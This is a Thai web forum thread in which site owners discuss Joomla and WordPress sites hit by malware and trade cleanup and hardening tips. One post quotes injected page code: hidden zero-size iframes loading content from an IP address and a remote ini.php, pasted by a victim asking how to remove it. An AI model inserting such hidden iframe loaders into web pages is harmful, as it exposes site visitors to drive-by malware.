ใครใช้ Joomla อยู่ ช่วงนี้โดนมัลแวร์กันไหมครับ ผมโดนไป 3 เว็บ จุกเลย

[illusionto]

  กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ

[ShizzK]

ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

[illusionto]

ของผมนะครับ โหลดไฟล์มาที่เครื่อง แล้วสแกนไวรัสดู ถ้าไม่มี

ให้เราสแกนเครื่องของเรา เปลี่ยนพาส ftp ไปหาไฟล์ที่ติดมัลแวร์ ส่วนใหญ่เวลาเข้าไปในไฟล์นั้นมันจะขึ้นว่าติดมัลแวร์

แสดงว่าไฟล์นั้นแหละตัวนำไวรัส ถ้าำไม่เจอไฟล์ไหนเลย

ก็ให้เราไปดูที่ htaccess ดูว่ามีการ refer หรือโยกย้ายหน้าโดเมนไปที่อื่นรึเปล่า หรือไปดูที่ google webmaster tools นะครับ

เขาจะบอกไ้ว้หมด

ขอบคุณมากเลยครับ ครั้งแรกเลยที่โดน เวลาเข้าระบบ admin หรือ host ทีก็กลัวๆอยู่ว่าถ้าเข้าไปดำเนินการต่อ จะติดไวรัสมัลแวร์เพิ่มอีกไหม ทำให้ล่าช้าในการแก้ไวรัสครับ

[Bes]

ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้

[smapan]

เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ

[Freedomlover]

เบื้องต้นสุดๆของการรักษาความปลอดภัย คืออัพเดต version ให้ล่าสุดเสมอ ครับ

แนะนำตามนี้ครับ

[CMSHostThailand]

Male Ware InJection

วิธีแก้ไข redirect to minkof.sellclassics.com
http://www.cmshostthailand.com/support/knowledgebase.php?action=displayarticle&id=518

Case By Customer

[binknon7]

ผมยังไม่โดนนะ 

[iamscreener]

กำลังนั่งเซ็งอยู่เลยครับไม่คิดว่าจะโดนเองหลังจากที่เคยเห็นแต่เว็บคนอื่นเขาโดนกัน ส่วนใหญ่ ผมใช้ joomla เป็นหลัก มาวันนี้ joomla ป่วยติดไวรัส มัลแวร์เลย จากการประกาศเตือน ของอากู๋ก่อนหน้านี้ จากการแนะนำสำหรับเว็บที่ติดมัลแวร์ http://www.stopbadware.org/home/security เปิดเว็บตัวเองวันนี้โดนเลย ใครพอมีแนวทางการกำจัดไวรัส ทั้งในโฮส และเครื่องคอมพิวเตอร์ของเรา  ช่วยผมทีนะคร้าบ เผื่อใครที่โดนแบบผมจะได้แก้ไขได้ทัน  ครั้งแรกของการทำเว็บ  ขอบคุณคร้าบ

ผมก็เพิ่งโดนไปครับ เป็นกำลังใจให้ครับ

[denzicrew]

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

[smapan]

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

อัพเดต ตรงไหนครับที่พัง และ พังยังไงครับ

[dramaseo]

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

[jupiterjan]

ใช้ template nulled หรือปล่าวครับ กำลัง จะใช้ joomla

[dramaseo]

อีกอย่างพวกเทมเพลตมาตรฐานที่แถมมาให้ ถ้าเราโมด้วยเทมเพลตเหล่านี้มันจะอัพเดทด้วย ต้องแบคอัพไฟล์เทมเพลตไว้ก่อน แล้วค่อยเอาไปทับหลังอัพเดท

[denzicrew]

หลังจากเว็บพังเพราะไปอัพเดทไม่สำเร็จ ต่อมาเจอแฮค และพึ่งมาโดนมัลแวร์จบไป ... รู้สึกว่าตัวเองรู้ขึ้นเยอะกว่าเดิม แต่ก็แอบท้อ ตอนนี้พยายามหาวิธีอัพเดทเวอร์ชั่นจูมล่าใหม่ หรือจะเปลี่ยนไปส้ราง WP ก็ยังคิดไม่ออก ใครมีวิธีอัพเดทแบบที่จะไม่ทำให้เวบพังบ้างมั้ยคะ

ก่อนอัพเดทผมจะแบคอัพไว้ก่อนเสมอ แล้วอัพเดทแบบเมนวลคือโยนไฟล์อัพเดทเข้าไปแทนทีเดิมใน FTP ซึ่งจริงๆหลังเว็บมีให้อัพเดทแบบออโต้นะ แต่ช้าๆอึดอัพเลยใช้แบบเมนวลแทน และไม่เคยพบว่าเว็บพังเลยนะ ต้องดูเวอร์ชั่นอัพเดทให้ตรงด้วย เช่นอัพจาก 2.5.4 ไป 2.5.6 ก็ต้องหาไฟล์เฉพาะของมัน

อัพจาก 1.5 ไป 2.5 ค่ะ เลยพัง (จริงๆมันก็สมควรใช่มั้ยล่ะ )

[siamlivehost]

ของลูกค้าผม ส่วนมากจะพรุนจาก template เถื่อนที่โหลดมาใช้กัน

[eyourhand]

เว็บผมก็โดนครับ เป็น WP

เบื้องต้นให้รีบทันทีคือ
- เปลี่ยน Pwd: FTP , Backend ต่างๆ ก่อน
- ปรับ CMOD : เป็นระดับ 644 , 444 (index.php)
- สแกนไวรัส ที่เครื่องตัวเองครับ
- ใช้ FileZilla ในการอัฟโหลด และล้าง pwd การ login เข้า ทุกครั้ง

ส่วนต่อมา
- Google webmaster tool ก็สมัครเพื่อให้เห็นปัญหาครับ
ยังไงปรึกษา ทาง PM ได้ครับ 

[fungi456]

4 เว็บ โดนทั้ง Joomla และ SMF ตอนนี้แก้ไขเรียบร้อยหมดแล้ว แต่ก็ยังแอบหวั่นใจอยู่ ช่วงนี้ต้องระวังมากๆ ชุมกว่าหวัดนกอีก

[greennud]

รบกวนสอบถามครับ ว่า

เมื่อเราเข้าไปที่หน้า url http://www.abc.com/index.php/visa

เมื่อเราดูจาก code จาก page source แล้วพบว่าพบ code ที่โดนแทรก code อย่างนี้

=====================================

<iframe onload="iFrameHeight()"   id="blockrandom"
   name=""
   src="http://88.198.219.85"
   width="1"
   height="1"
   scrolling="auto"
   align="top"
   frameborder="0"
   class="wrapper">
   No Iframes</iframe>
?>
</body><iframe src="http://www.emkbiyomedikal.com.tr/tmp/ini.php"  width="0" height="0" frameborder="0"></iframe>

=====================================

หากผมต้องการเข้าไปลบออก ต้องไปลบที่ไฟล์ไหนครับ
ขอบคุณมากครับ

[phpwin]

ระวังเรื่องการ Chmod 777 ให้เฉพาะที่ Joomla ต้องการก็พอ มากกว่านั้นจะมีปัญหาได้

ตามความคิดเห็นนี้ครับ 777 เฉพาะการอัพโหลดรูปหรือไฟล์ก็พอครับ แล้วเขียน .htaccess ดักในโฟลเดอร์นั้นอีกทีว่า ให้อัพโหลดไฟล์นามสกุลอะไรได้บ้าง
แนะนำให้อัพเกรดเป็นเวอร์ชั่นล่าสุดครับ ตอนนี้ผมใช้ Joomla 2.5.14 อยู่ครับ

โค้ด เลือก ขยาย

http://www.joomlacorner.com/joomla-news/829-joomla-2-5-14-released.html